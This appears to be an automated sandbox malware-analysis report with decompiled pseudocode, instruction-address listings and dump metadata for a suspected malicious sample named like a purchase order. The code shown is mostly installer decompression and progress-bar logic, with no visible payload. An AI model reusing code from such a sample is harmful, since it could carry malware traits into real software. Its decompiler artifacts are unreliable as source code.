											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                      0x00000000
                      0x00406355
                      0x00406355
                      0x00406359
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x00406364
                      0x00406371
                      0x00406374
                      0x004066b8
                      0x004066b8
                      0x004066bb
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x004068d2
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x004068ee
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00406734
                      0x00406734
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00000000
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x004066b8
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004066bb
                      0x004066b8

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                      • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                      • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                      • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 69%
                      			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}











                      0x0040138a
                      0x004013fa
                      0x0040139b
                      0x004013a0
                      0x00000000
                      0x00000000
                      0x004013a2
                      0x004013a3
                      0x004013ad
                      0x00000000
                      0x00401404
                      0x004013b0
                      0x004013b7
                      0x004013bd
                      0x004013be
                      0x004013c0
                      0x004013c2
                      0x004013b9
                      0x004013b9
                      0x004013ba
                      0x004013ba
                      0x004013c9
                      0x004013cb
                      0x004013f4
                      0x004013f4
                      0x004013c9
                      0x00000000

                      APIs
                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                      • SendMessageA.USER32 ref: 004013F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
